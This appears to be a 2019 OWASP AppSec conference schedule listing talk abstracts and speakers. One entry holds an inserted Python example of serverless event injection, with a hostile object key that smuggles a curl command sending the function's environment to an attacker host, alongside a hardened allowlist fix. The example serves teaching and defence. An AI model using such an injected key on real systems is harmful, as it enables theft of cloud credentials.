There have been a lot of conversations around diversity and inclusion in the recent past. This is a step in a positive direction. The benefits of diversity in cybersecurity are clear. As an industry, we can do better, and we need to do better. We need not only to keep the conversation going but to really place some action behind it. While homogenous teams feel easier to operate in, they can lead to stagnation, or to specialisation in some aspects at the expense of others.

In this talk, I will present some of my thoughts on the importance and benefits of diversity and inclusion in our industry. I will share some of my experiences working over the last few years towards diversity initiatives, some real change observed, challenges associated with it and small steps anyone can do to improve diversity.

Speakers

Vandana Verma

Security Architect, IBM India Software Labs
Vandana is a seasoned security professional with over a decade worth of experience ranging from application security to infrastructure and now dealing with cloud security. She works with various communities (InfosecGirls, OWASP, WoSec, and null) and is passionate about increasing...


Thursday September 12, 2019 2:00pm - 3:00pm
Salon 2

3:00pm

PM Coffee Break
Thursday September 12, 2019 3:00pm - 3:30pm
Exhibit Hall C

3:30pm

Building Secure Password-less Web Applications using WebAuthn
According to the 2019 Verizon Data Breach Investigation Report, 81% of breaches were caused by weak, stolen or reused passwords. But what if you NEVER had to deal with passwords in the first place? For the past several years, security experts across the industry have been working on a robust authentication protocol that does not involve passwords. The result is a specification called WebAuthn, which is now an official W3C web standard. With WebAuthn, developers can build secure web applications that enable users to experience password-less logins. In this session, we will explain how WebAuthn works and show how developers can leverage it using a demo.

Speakers

Krishna Chaitanya Telikicherla

Security Engineer, Microsoft
Krishna Chaitanya Telikicherla works as a Security Engineer at Microsoft. He is passionate about application security, with specific interest in static code analysis. He also loves to play around with security and identity controls in Asp.net and Azure. Krishna blogs at https://novogeek.com...

Murali Vadakke Puthanveetil

Security Engineer, Microsoft
Murali Vadakke Puthanveetil works as a Security Engineer at Microsoft and is a previous speaker at AppSec USA. He is particularly interested in figuring out the authentication and authorization logic used by web applications.


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 2

3:30pm

Securing Modern Applications: The Data Behind DevSecOps
Hackers took three days to identify and exploit a known vulnerability in Equifax's web applications. More importantly, Equifax was not alone. Hackers quickly attempted to exploit the Struts vulnerability elsewhere. According to David Hogue, a senior technical director for the NSA’s Cybersecurity Threat Operations Center (NCTOC), "We had a nation-state actor within 24 hours scanning for unpatched [Struts] servers within the DoD." Other breaches were recorded at Alaska Airlines, the Canada Revenue Agency, Okinawa Power, the Japanese Post, the India Post, AADHAAR (India’s social security system), and the GMO Payment Gateway, to name a few.

The time required for hackers to exploit a newly disclosed open source vulnerability has shrunk by 93.5% in the last decade. This harsh reality establishes a new normal for software supply chain management and demands that organizations are prepared to do three things within 48 hours of a new public disclosure:
* Assess which, if any, of their production applications are exploitable
* Establish a comprehensive plan to remediate potential exposure
* Implement necessary fixes in production

This session will highlight new data that reveals why three days (at most) is the new normal for DevSecOps teams to move new business/security requirements from design into production. It will also further enlighten DevOps teams, security and development professionals by sharing results from the 5th annual State of the Software Supply Chain Report, a blend of public and proprietary data with expert research and analysis. Attendees can join this session to better understand how development and AppSec teams are applying lessons from W. Edwards Deming (circa 1982), Malcolm Goldrath (circa 1984) and Gene Kim (circa 2013) to improve their ability to respond to new business requirements and cyber risks.

Speakers

Derek Weeks

Vice President, Sonatype
Derek E. Weeks is the world's foremost researcher on the topic of DevSecOps and securing software supply chains. For the past five years, he has championed the research of the annual State of the Software Supply Chain Report and the DevSecOps Community Survey. Derek is a huge advocate...


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 3

3:30pm

Building Secure React Applications
Cross-Site Scripting (or client-side JavaScript injection) and other client-side risks are well-known technical challenges that web application developers have faced for many years. While frameworks like React provide some automatic defenses to stop Cross-Site Scripting, React developers still require specialized knowledge to build secure React applications. This presentation will review some of the necessary general-purpose Cross-Site Scripting defense recommendations, as well as present specialized techniques that all React developers who wish to build secure React applications will benefit from.

Speakers

Jim Manico

Founder, Manicode Security
Jim Manico is the founder of Manicode Security where he trains software developers on secure coding and security engineering. He is also an investor/advisor for KSOC, Nucleus Security, Signal Sciences and BitDiscovery. Jim is a frequent speaker on secure software practices, is a member...

Ron Perris

Manicode Security
Ron provides secure code training and specific remediation guidance through in-person workshops and online courses at Manicode Security. Also, as a member of the Node.js Security WG, Ron provides source code review and code remediation guidance to the JavaScript developer communi...


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 6

3:30pm

Quantifying the Security Benefits of Debloating Web Applications
As software becomes increasingly complex, its attack surface expands, enabling the exploitation of a wide range of vulnerabilities. Web applications are no exception, since modern HTML5 standards and the ever-increasing capabilities of JavaScript are utilized to build rich web applications, often subsuming the need for traditional desktop applications.

One possible way of handling this increased complexity is through the process of software debloating, i.e., the removal not only of dead code but also of code corresponding to features that a specific set of users do not require. Even though debloating has been successfully applied on operating systems, libraries, and compiled programs, its applicability on web applications has not yet been investigated.

In this project, we present the first analysis of the security benefits of debloating web applications. We focus on four popular PHP applications and we dynamically exercise them to obtain information about the server-side code that executes as a result of client-side requests. We evaluate two different debloating strategies (file-level debloating and function-level debloating) and we show that we can produce functional web applications that are 46% smaller than their original versions and exhibit half their original cyclomatic complexity. Moreover, our results show that the process of debloating removes code associated with tens of historical vulnerabilities and further shrinks a web application’s attack surface by removing unnecessary external packages and abusable PHP gadgets.

Speakers

Babak Amin Azad

PhD Candidate, Stony Brook University
Babak is a PhD candidate at the State University of New York at Stony Brook. On a normal day, he studies vulnerabilities and practices that make the web an unsafe place. These days, his main focus is on web attack surface reduction and also bot detection. Prior to starting his PhD, he...


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 4

3:30pm

API Security Project
Join us and take part in the creation of the API Security Project.
  • How are API-based apps different from traditional apps?
  • Why do these apps deserve their own OWASP security project?
  • Roadmap of the project
  • Introducing API Security Top 10 - RC1 in depth
  • Next steps
Join the mailing list:
Join the effort:

Speakers

Inon Shkedy

Head of Security Research, Traceable.ai
The speaker has 8 years of experience in application security. He started his career in a red team in a government organization for 5 years, and then moved to Silicon Valley to learn more about startups, modern applications and APIs. Today he provides consultation to various companies...

Erez Yalon

Director of Security Research, Checkmarx
Director of Security Research at Checkmarx; Project Leader at OWASP; Founder of AppSec Village at DEF CON


Thursday September 12, 2019 3:30pm - 4:15pm
Virginia A

3:30pm

Beyond data-at-rest: Advances in Native NoSQL Database Encryption
Highly sensitive databases require enhanced technical measures to protect the confidentiality of their workloads. Typical controls in our application toolkit for these scenarios include implementing well-defined, mature authentication & authorization, and strong network (data-in-transit) & storage (data-at-rest) encryption paired with modern key management practices. Some systems further offer database-specific encryption mechanisms which work at the physical datafile level (and even the column- or row-level in a relational database) on top of any underlying OS full-disk or whole-volume encryption. But fundamentally, these are server-side encryption models where the threat is physical media breach, backup leaks, or possibly certain classes of operating system attacks; the assumption is that the database administrator, root user, or system-level processes running on the machine are fully trusted to access plaintext data and their associated keys.

This session will take a deep dive into the threat models, designs and recent developments in client-side (data-in-use) encryption, including lessons learned from recent work bringing native client-side query integration into the most widely deployed open source NoSQL database in the world. We will discuss the security guarantees, confidentiality/performance trade-offs, and limitations among different types of authenticated encrypted search. Reference query design patterns will be presented, with example code demonstrating strong end-to-end encryption on public cloud or in on-premises datacenters.

Speakers

Kenneth White

Product Security, MongoDB
Kenneth White is a security engineer whose work focuses on networks and global systems. He is co-founder and Director of the Open Crypto Audit Project and led formal security reviews on TrueCrypt and OpenSSL. He currently leads applied encryption engineering in MongoDB's global product...


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 5

4:30pm

Running FaaS with Scissors
Taking a DevSecOps mindset has created many opportunities to nudge organizations into improving how we create secure code. The security and DevOps landscape has continued to evolve, with many exciting improvements in the past year. In this talk, we’ll cover the new methods available utilizing serverless and Function as a Service (FaaS) technologies. We’ll discuss how you can pave a speedy road for app teams to develop on while constructing guard rails using OpenFaaS. Utilizing containerized security tools allows for dramatically quicker and more consistent assessments of both running and static code. By using the techniques discussed, you can change security testing from an occasional point-in-time exercise to continuous testing with fast feedback loops. Having created these at past employers, we bring real-world experience of creating fast and agile testing automation to AppSec teams.

Speakers

Matt Tesauro

Matt Tesauro is currently establishing an SDLC at a large healthcare software provider. Prior to his current role, he was a Senior AppSec Engineer building an AppSec Pipeline and continuous security program for Duo Security. Previously, he was a founder and CTO of 10Security, a Senior...


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 2

4:30pm

A Case Study in Scaling Oversight
Learn how a seemingly inconsequential code pattern enables development teams to bound the amount of code that needs security scrutiny, how combining it with some specific software pipeline & workflow changes enables a small blue team to ride herd on a larger, fast-moving application development group, and how this incentivized investment in security infrastructure within Google.

This talk:
* uses the Trusted Types WICG proposal to explain the code change,
* explains how Google has internally done the same for server-side injection vulns across 6 programming languages and presents bug bounty stats for projects (Gmail and others) that adopted these techniques,
* explains how we tweaked Google's code analysis pipeline and commit workflow to enable efficient interactions between security & devs,
* identifies analogous (& currently-overlooked) open-source mechanisms,
* explains how some specific integrations guide developers towards secure code patterns and incentivize investment in secure tools & abstractions.

Speakers

Mike Samuel

Software Engineer, Google LLC
Mike Samuel works on Google's technical infrastructure team improving libraries and programming languages to make it easier to produce secure & robust software. Mike has worked on JavaScript sandboxing, the Secure EcmaScript and other language committee proposals, making template...


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 3

4:30pm

The As, Bs, and Four Cs of Testing Cloud-Native Applications
Security assessments are a critical part of any security program. Being able to identify – and communicate about – vulnerabilities in systems is required to get vulnerabilities prioritized for remediation. For web and mobile applications, assessment methodologies are reasonably straightforward and established. However, for cloud-native applications, the combination of new technologies and architectural elements has introduced questions about how to scope, plan, and execute security assessments. This presentation looks at how the assessment landscape has changed with the introduction of cloud-native applications and explores how threat modeling is central to testing their security. In addition, the “Four C’s” conceptual model for looking at cloud-native application security is introduced, including a discussion of how both automated and manual testing methodologies can be used to accomplish assessment goals. Finally, vulnerability contextualization and reporting are discussed, so that teams running cloud-native application assessments can properly characterize the results of their efforts to aid in the prioritization and remediation of identified issues.

Speakers

Dan Cornell

CTO, Denim Group
A globally recognized application security expert, Dan Cornell holds over 20 years of experience architecting, developing and securing web-based software systems. As Chief Technology Officer and Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies...


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 6

4:30pm

Fighting Formjacking and Magecart - Separating fact from fiction
“Formjacking attacks are simple and lucrative: cybercriminals load malicious code onto retailers’ websites to steal shoppers’ credit card details, with 4,800+ unique websites compromised on average every month. Both well-known and small-medium businesses were attacked, conservatively yielding tens of millions of dollars to bad actors last year.” - Symantec 2019 Internet Security Threat Report

There are several ways to distribute Formjacking scripts, from browser add-ons to malware on the machine, but the most popular way is compromising a site's 3rd-party JS and using it to hitchhike to all of that provider's clients.

Because 3rd-party scripts are loaded directly into the browser from remote servers, they are out of bounds for traditional security solutions like firewalls, WAFs and such. They are also tough to monitor, as their behavior may change from user to user, making their actions very hard to analyze. However, these scripts share the same level of access to a webpage as the website’s internal scripts. Every script on the page can have access to every field, manipulate the content of the page and even record keystrokes.

Millions of users were affected by this attack in the past year alone, as it is the favorite tactic of the Magecart groups (named so for targeting Magento-based sites) and was behind many high-profile hacks, from Delta Airlines to British Airways, Ticketmaster and more.

The recent rise in Formjacking attacks created much noise, pointing to multiple technologies to try and close this gap, from CSP and SRI to proxying JS to control JS actions on the page and real-time sandboxing. These are said with such passion that none are discussing the drawbacks of each approach. In my presentation, I cover all approaches, show real-time demos of Formjacking code, how the advocated methods can block it, and if and how these can be easily circumvented.

Speakers
avatar for Avital Grushcovski

Avital Grushcovski

EVP Product & PS, Source Defense
An entrepreneur at heart, Avital is first and foremost a creator and a problem solver. For many years, Avital has brought cohesion to the security, professional services, R&D, and marketing efforts of organizations; finding the balance needed to move the company forward while keeping... Read More →


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 4

4:30pm

What Do Hackers Want from Bounty Programs?
Bounty programs are all the rage these days, but what do hackers/researchers think of them? Drawing on my experience as a participant in multiple bounty programs, I want to discuss the ins and outs of how hackers work with companies, what they are looking for (hint: not just money) and how companies can improve their programs to attract more researchers.

Speakers
YS

Yakov Shafranovich

Application Security
I am a technology generalist focused on solving problems. Some of the things I have done include: developing visual SQL tools, contributing to mobile apps to help people get healthier, and helping non-profits preserve books. I also participated in the development of many anti-spam standards... Read More →


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 5

5:30pm

Networking Event
Thursday September 12, 2019 5:30pm - 7:30pm
Exhibitor Hall C

6:00pm

Leaders Meeting
Thursday September 12, 2019 6:00pm - 7:30pm
Lincoln 2
 
Friday, September 13
 

7:30am

Registration
Friday September 13, 2019 7:30am - 5:00pm
Atrium

8:00am

Capture the Flag - CMD+CTRL Web Application Cyber Range
CMD+CTRL Web Application Cyber Range
Want to test your skills in identifying web app vulnerabilities? Join OWASP and Security Innovation as attendees compete in CMD+CTRL, a web application cyber range where players exploit their way through hundreds of vulnerabilities that lurk in business applications today. Success means learning quickly that attack and defense is all about thinking on your feet.
For each vulnerability you uncover, you are awarded points. Climb the interactive leaderboard for a chance to win fantastic prizes! CMD+CTRL is ideal for development teams to train and develop skills, but anyone involved in keeping your organization’s data secure can play, from developers to managers and even CISOs.
Register early to reserve your spot!
https://web.securityinnovation.com/owaspdc2019

Speakers
avatar for Kevin Poniatowski

Kevin Poniatowski

Senior Security Instructor and Engineer, Security Innovation
Kevin Poniatowski, Senior Security Instructor and Engineer at Security Innovation, brings an optimal blend of speaking ability, technical savvy, and an insatiable passion for security to Security Innovation's training customers. This produces an engaging and enlightening environment... Read More →


Friday September 13, 2019 8:00am - 3:00pm
Virginia B

9:00am

Talent matters. You matter.
The internet wasn’t built with security in mind, the world has a massive talent shortage, and we can’t rely on automation to solve everything.

If you’re on an application security team, I’m willing to bet you have more to do than time and resources to do it. Maybe one of your colleagues left for a new job last month, and there are two additional unfilled positions on your team. You could actually be in a position where you’re trying to do the jobs of 4 people.

Talent matters. You matter.

This talk is about preventing and addressing burnout for overworked application security professionals. It’s also about how to attract, retain, and grow a great team.

Speakers
avatar for Caroline Wong

Caroline Wong

Caroline’s close and practical information security knowledge stems from broad experience as a Cigital consultant, a Symantec product manager, and day-to-day leadership roles at eBay and Zynga. Caroline is an advisor for RSA Conference and ISC2 North America. She has been featured... Read More →


Friday September 13, 2019 9:00am - 10:00am
Salon 2

10:00am

AM Coffee Break
Friday September 13, 2019 10:00am - 10:30am
Exhibit Hall C

10:00am

Members Lounge
Looking for a place to recharge your electronics?  
Feeling a bit hungry or thirsty?  
Maybe you are looking for some cool OWASP Member Only swag?
Or just looking to take a break from the hectic conference atmosphere?
Head on over to the Members Lounge located in the XXXX Room.

Here you can grab a snack, quench your thirst, recharge your electronics, kick up your feet, and network with other OWASP members all within a relaxed atmosphere.

Not an OWASP Member?  No problem!  Swing on over to the lounge, and you can sign up on the spot, or join here!

Look for the signs or ask a volunteer how to find us!

Friday September 13, 2019 10:00am - 3:00pm
Atrium

10:30am

A Purple Team View of Serverless and GraphQL Applications
The presentation will begin with a quick refresher on serverless functions and GraphQL applications. The author will deploy a serverless function with GraphQL to demonstrate.

The presentation, with demos, will also highlight some common attacks against serverless functions, namely:
* Function Data Event Injection
* Lateral Movement through Remote Code Execution on a Function
* NoSQL Injection, specifically DynamoDB Injection
* ReDoS Attacks against Serverless functions, increasing the transaction fee per invocation to large values (e.g. $3 per request)

Subsequently, the author will demonstrate attacks against GraphQL functions like:
* Authorization Bypass through Introspection
* Insecure Direct Object Reference Attacks
* NoSQL Injection Attacks
* Deserialization vulnerabilities

Finally, the presentation ends with the author demonstrating attacks against serverless GraphQL applications, where the author will use Remote Code Execution and DoS-style queries to demonstrate specific attacks leading to cloud API-based lateral movement and DoS leading to financial exhaustion.

All the while, the author will highlight some key deficiencies: the lack of tooling, of “batteries-included” security frameworks and of DIY validation that might exacerbate these flaws.
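Added example, not code from either of the serverless talks in this slot: the first attack listed above, function data event injection, shown on a constructed S3-style event handled by a Python function, with the vulnerable and the hardened handler side by side. The event, object key, attacker hostname and the pdftotext command are assumptions for illustration; no AWS SDK is involved.

```python
import re
from urllib.parse import unquote_plus

# Constructed S3-style notification events.  The object key is attacker
# controlled: whoever can upload to the bucket chooses the file name, and S3
# delivers it URL-encoded inside the event.
BENIGN_EVENT = {"Records": [{"s3": {"object": {"key": "invoices/2019-09.pdf"}}}]}
HOSTILE_EVENT = {"Records": [{"s3": {"object": {
    "key": "x.pdf%3B+curl+http%3A%2F%2Fattacker.invalid%2F%3Fe%3D%24%28env%7Cbase64%29"}}}]}


def object_key(event: dict) -> str:
    """Extract and decode the key exactly as a handler would."""
    return unquote_plus(event["Records"][0]["s3"]["object"]["key"])


def vulnerable_command(event: dict) -> str:
    """Vulnerable pattern: the decoded key is spliced into a shell command line that
    the handler would hand to subprocess.run(cmd, shell=True).  Returned instead of
    executed so the injected command is visible.  The function's environment, which
    holds its temporary role credentials, is what the hostile key tries to exfiltrate."""
    return "pdftotext /tmp/%s /tmp/out.txt" % object_key(event)


# Allowlist for keys this function is willing to process.  Anchored by fullmatch,
# one bounded quantifier and no nesting, so the validation itself cannot be driven
# into catastrophic backtracking (the ReDoS cost amplification listed above).
SAFE_KEY = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,254}")


def is_safe_key(key: str) -> bool:
    """Allowlisted characters only, and no '..' path component."""
    return bool(SAFE_KEY.fullmatch(key)) and ".." not in key.split("/")


def hardened_argv(event: dict) -> list:
    """Hardened: validate the key, then pass it as a discrete argv element so no
    shell ever parses it (subprocess.run(argv) with the default shell=False)."""
    key = object_key(event)
    if not is_safe_key(key):
        raise ValueError(f"rejected object key: {key!r}")
    return ["pdftotext", "/tmp/" + key, "/tmp/out.txt"]


if __name__ == "__main__":
    print(vulnerable_command(HOSTILE_EVENT))
    print(hardened_argv(BENIGN_EVENT))
    try:
        hardened_argv(HOSTILE_EVENT)
    except ValueError as exc:
        print(exc)
```

Rejecting rather than sanitising keeps the decision auditable: a refused event shows up in the function's logs with the offending key, which is the signal a detection team wants when someone starts probing the bucket.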

Speakers
avatar for Abhay Bhargav

Abhay Bhargav

Founder, we45
Abhay Bhargav is the Founder of we45, a focused Application Security Company. Abhay is a builder and breaker of applications. He is the Chief Architect of “Orchestron", a leading Application Vulnerability Correlation and Orchestration Framework. He has created some pioneering works... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 2

10:30am

OWASP Serverless Top 10
In moving to serverless, we shift some security responsibilities to the infrastructure provider by eliminating the need to manage servers. Unfortunately, that doesn’t mean we’re entirely absolved of all security duties. Serverless functions still execute code and can still be vulnerable to application-level attacks. As a new type of architecture, serverless presents new security challenges. Some are equal to traditional application development, but some take a new form. Attackers are thinking differently, and developers must do so as well to gain the upper hand.

In this talk, I will dive into the Top 10 risks of the OWASP Serverless Top 10 project. I will discuss why these risks are different from traditional attacks and how we should protect our application against them. I will also introduce OWASP DVSA, a deliberately vulnerable tool, aiming to assist both security professionals and developers to better understand the implications and processes of serverless security.

Speakers
avatar for Tal Melamed

Tal Melamed

Head of Security Research, Protego Labs
In the past year, Tal Melamed has been experimenting in offensive and defensive security for the serverless technology, as part of his role as Head of Security Research at Protego Labs. Specializing in AppSec, he has more than 15 years of experience in security research and vulnerability... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 3

10:30am

0 to 1 Startup Security
Have you ever wondered what it takes to bring a startup from "zero security" to "I think we can go public" or "we are ready for enterprise business now"? That is what this talk is about: what it takes from a talent, program and political standpoint to make this happen.

Speakers
avatar for Coleen Coolidge

Coleen Coolidge

CISO, Segment
Coleen Coolidge is the CISO @ segment in San Francisco, building holistic security and trust programs to protect customer data. Previously, she did the same at Twilio (pre-IPO through post-IPO) as Sr Director of Trust and Security. She's also served in security-leadership positions... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 6

10:30am

SSO Wars: The Token Menace
It is the year 2019. Humanity has almost won its long-standing war against Single-Sign On (SSO) bugs. The last of them were discovered and eradicated some time ago and the world is now living in an era of prosperity while the Auth Federation enjoys peaceful CVE-free times. However, while things seem to be running smoothly, new bugs are brewing at the core of major implementation libraries. This is probably the last chance for the evil empire to launch a world scale attack against the Auth Federation.

In this talk, we will present two new techniques:
1) A new breed of SAML implementation flaws that break XML signature validation and enable arbitrary modification of the SAML assertion, which enables attackers to authenticate as arbitrary users or grant themselves arbitrary authorization claims. Although any implementation may be affected by this flaw, we will show how it affects Microsoft Windows Identity Framework (WIF) applications, Windows Communication Foundation (WCF) web services, and flagship products such as SharePoint and Exchange Servers.
2) A bug in the .NET crypto library, which may allow attackers to gain Remote Code Execution (RCE) or Denial of Service (DoS) depending on the availability of code gadgets in the target server.

Speakers
avatar for Alvaro Muñoz

Alvaro Muñoz

Principal Security Researcher, Micro Focus Fortify
Alvaro Muñoz (@pwntester) works as a Principal Software Security Researcher with Micro Focus Fortify, Software Security Research (SSR) team. Before joining the research organization, he worked as an Application Security Consultant helping top enterprises to deploy their application... Read More →
avatar for Oleksandr Mirosh

Oleksandr Mirosh

Micro Focus
Oleksandr Mirosh has over 11 years of computer security experience, including vulnerability research, penetration testing, reverse engineering, fuzzing, developing exploits and consulting. He is working for Fortify Software Security Research team in Micro Focus investigating and analyzing... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 4

10:30am

Dependency Check
Speakers
avatar for Jeremy Long

Jeremy Long

Principal Engineer
Jeremy Long is a principal engineer at a large financial institution. He specializes in securing the SDLC via secure development training, security requirements and coding standards, tooling for early identification in build pipelines, etc. He has a deep understanding of static analysis... Read More →


Friday September 13, 2019 10:30am - 11:15am
Virginia A

10:30am

Keys Under Doormats: Problems and Solutions for Securely Storing Credentials in Web Applications
Encryption keys and passwords are truly "keys to the kingdom." Acquiring them allows attackers to open all kinds of doors, and yet developers are often careless about how they handle them. We often see passwords and keys hard coded in the application source, stored with minimal obfuscation in configuration files, and in plaintext in databases. As a result, they fall victim to reverse engineering and software vulnerabilities such as Path Traversal, XXE, Local File Inclusion, and others.

To help illustrate these risks we review the most common methods of storing credentials in an application, and discuss best practices for storing them, such as using keystores.

Once your secrets are properly secured, however, there is an important remaining issue -- how do you secure the Master Key? The security of this “key that secures other keys" (often referred to as the Key Encrypting Key or KEK) is critical to the security of the system. Would it not be vulnerable to the same issues we just tried to solve with keys and passwords? In our presentation we discuss preferred ways for securely storing KEKs, from hardware to software, and their relative costs.

We propose several low cost ways for storing KEKs that any application can afford to implement, including what we believe is a novel approach that is resistant to remote attacks up to and including path traversal vulnerabilities where the attacker can obtain the contents of all relevant files. We then conclude by offering our open source library that helps to achieve that.

Speakers
avatar for Dmitriy Beryoza

Dmitriy Beryoza

Senior Security Researcher, Vectra AI
Dmitriy is a Senior Security Researcher at Vectra AI. He spent over 25 years of his life building software before realizing that breaking it is much more fun. :) Dmitriy is passionate about all things security, with a particular interest in web and binary exploitation, reverse engineering... Read More →
avatar for Ron Craig

Ron Craig

Program Manager for IBM Security's Secure Engineering and Incident Response, IBM
Ron works to help bridge the gap between Security knowledge and practice. His passion is educating developers and business leaders in why secure engineering is important and how it affects all our lives. Ron has over 30 years of experience in development and engineering. His interests... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 5

11:30am

How to Build an AppSec Training Program That Isn’t Boring
Training plays a critical role in software security because developers often start with little security knowledge. This lack of knowledge can be augmented through use of automated tools and dedicated security professionals to discover vulnerabilities, but security personnel can be challenging to scale and tools cannot identify many weaknesses.

Maybe you currently have some training in place, but it isn’t well received and seen more as a mandatory interruption rather than providing real value. Maybe the content doesn’t feel up to date or relevant to your team based on the technology frameworks they use. Other challenges include budget constraints, attendee participation, knowledge retention, training recurrence, tracking, and measuring general effectiveness.

This presentation will examine various approaches for providing application security training within your organization or team. We’ll look at how you can leverage free and low-cost content to get started with a limited budget, and examine pros/cons of various forms of training: instructor-led, computer-based training, hands-on labs, gamification, etc. We will detail actionable steps you can take to bootstrap, monitor, and maintain a customized program that builds lasting appsec knowledge in your organization.

Speakers
avatar for Brice Williams

Brice Williams

Cybersecurity Practice Lead, SysLogic
Brice Williams is the Practice Lead for Application Security Services at SysLogic Inc. and has over 20 years of experience in software development and security best practices. Brice serves as a trusted advisor to global organizations providing modern cybersecurity guidance and support... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 2

11:30am

A Practical Guide to Complying with SB-327 (Information Privacy of Connected Devices)
Senate Bill 327 sets a new standard for the security and privacy of connected devices. It will come into force in January 2020. The way connected devices are defined in this bill is broad. The effect of the law is not limited to a state, since it is not justifiable, or in many cases feasible, for a typical manufacturer to launch different products in different geo-locations within a country. During the talk, several questions around the scope and applicability of the law are rigorously analyzed and answered after careful examination of the possible scenarios and products. The talk presents categories of 'appropriate' security features to take into consideration, and provides a taxonomy of security controls applicable in various cases and scenarios. The audience will leave the talk with practical steps and guidelines as to how they can comply with the regulation.

Speakers
avatar for Farbod H Foomany

Farbod H Foomany

Technical Lead of Security Research, Security Compass
Farbod H Foomany is a technical lead (of security research) at Security Compass. He has degrees in electrical engineering (control systems), computer engineering (artificial intelligence), and has completed a PhD with main research on security aspects of using voice-print and other... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 3

11:30am

A Day in the Life of IoT Security Architect
How IoT security differs from a typical traditional security architecture; the tasks performed by an IoT security architect in a system of connected devices; the steps taken by first responders to IoT threats; using the relevant tools to perform threat detection and monitoring; categorizing the typical process in a cloud-based IoT security environment; and analyzing end-to-end IoT use cases in a system of connected devices.

Speakers
avatar for Praveena Sridhar

Praveena Sridhar

Technical Leader IoT-Security, Cisco Systems
Praveena Sridhar is Technical Leader in Security-IoT and Quality with 20 years of experience in the software industry across various domains. She is B.E. (Hons) from BITS Pilani and has a Certificate from Stanford in Advanced Computer Security. She has technically managed teams... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 6

11:30am

Farewell, WAF - Exploiting SQL Injection from Mutation to Polymorphism
In this talk, we'll not only go through the core ideas and concepts of the web application firewall (WAF) and some background on mutation testing against web applications, but also introduce a promising direction: automatically generating SQL injection attacks with polymorphism. We'll give some case studies and bypasses for the latest version of ModSecurity alongside our demonstrations, and explain why common detections cannot help here. The audience will then realize the power of this concept and the beauty of the SQL language after the talk.

Speakers
avatar for Boik Su

Boik Su

Boik Su has five years' experience in web development, and actively uses open source software to create and manage applications or tools for his research in web security. He has received some awards from CTFs, and has been a speaker at AVTokyo 2017 and 2018, Taiwan Modern Web 2017, OSCON... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 4

11:30am

SAMM
OWASP SAMM (https://owaspsamm.org) is the prime maturity model for software assurance that provides an effective and measurable way for all types of organizations to analyse and improve their software security posture. Building security into the software development and management practices of a company can be a daunting task. There are many elements to the equation: company risk profile, organizational structure, different stakeholders, technology stacks, tools and processes, and so forth. Implementing software assurance will have a significant impact on the organisation. Yet, trying to achieve this without a good framework most likely leads to just marginal and unsustainable improvements.

OWASP Software Assurance Maturity Model (SAMM) gives you an effective and measurable way for all types of organizations to analyse and improve their software security posture in 3 levels of maturity, thus creating a step-by-step software assurance navigation plan. It enables you to formulate and implement a strategy for software security that is tailored to the risk profile of your organisation.

In this talk, we give an overview of the new release of the SAMM model. Ten years after its first conception, it was important to align it with today’s development practices. We will cover a number of topics in the talk: (i) the core structure of the model, which was redesigned and extended to align with modern development practices, (ii) the measurement model, which was set up to cover both coverage and quality, and (iii) the new security practice streams, where the SAMM activities are grouped in maturity levels. We will demonstrate the new SAMM2 toolbox to measure the maturity of an example DevOps team and how you can create a roadmap of activities.

Speakers
avatar for John Ellingsworth

John Ellingsworth

Security Principal
John Ellingsworth is a security principal at a Fortune 1000 company where he helps software development teams build secure enterprise solutions at scale. When not scaling application security, he can be found hanging out with his family, often outdoors, and probably scaling mount... Read More →
avatar for Hardik Parekh

Hardik Parekh

Senior Director, Head of Product & Application Security, Splunk
Hardik Parekh is a recognized thought leader and executive in the security/privacy domain with hands-on contributions to SANS CWE Top 25, OWASP OpenSAMM, BSIMM 1.0 to BSIMM 9, and SAFECode. Hardik is part of the core team which developed OWASP OpenSAMM 2.0. Hardik has 16+ years of hands-on... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Virginia A

11:30am

Common API Security Pitfalls
The shift towards an API landscape indicates a significant evolution in the way we build applications. The rise of JavaScript and mobile applications has sparked an explosion of easily-accessible REST APIs. But how do you protect access to your API? Which security aspects are no longer relevant? Which security features are an absolute must-have, and which additional security measures do you need to take into account?

These are hard questions, as evidenced by the deployment of numerous insecure APIs. Attend this session to find out about common API security pitfalls that often result in compromised user accounts and unauthorized access to your data. We expose the problem that lies at the root of each of these pitfalls, and offer actionable advice to address these security problems. After this session, you will know how to assess the security of your APIs, and the best practices to improve them towards the future.

Speakers
avatar for Philippe De Ryck

Philippe De Ryck

Founder, Pragmatic Web Security
Philippe De Ryck helps developers protect companies through better web security. As the founder of Pragmatic Web Security, he travels the world to train developers on web security and security engineering. His Ph.D. in web security from KU Leuven lies at the basis of his exceptional... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 5

12:30pm

Lunch
Friday September 13, 2019 12:30pm - 2:00pm
Exhibit Hall C

2:00pm

A DevSecOps Tale of Business, Engineering, and People
DevOps and the subsequent move to bring security in under the umbrella of DevSecOps has created a new ethos for security. This is good. But, when things go wrong–and we know they will–are we going to be successful with the DevSecOps model, or will we be left searching yet again?

In an attempt to answer this question, we will look back in time over 120 years to unveil a tale that touches on business, engineering, and resilience. We will see how engineering decisions affect the lives of those around us and even though the world has radically changed over the last century, we are still facing many of the same root challenges.

Along the way, we will highlight the high-performing DevSecOps teams of today and introduce a framework for approaching DevSecOps in your organization. Topics range from empathy to lean to system safety with the hope to frame a new playbook for devs, ops, and security to work together.



Speakers
avatar for James Wickett

James Wickett

Sr. Security Engineer and Developer Advocate, Verica
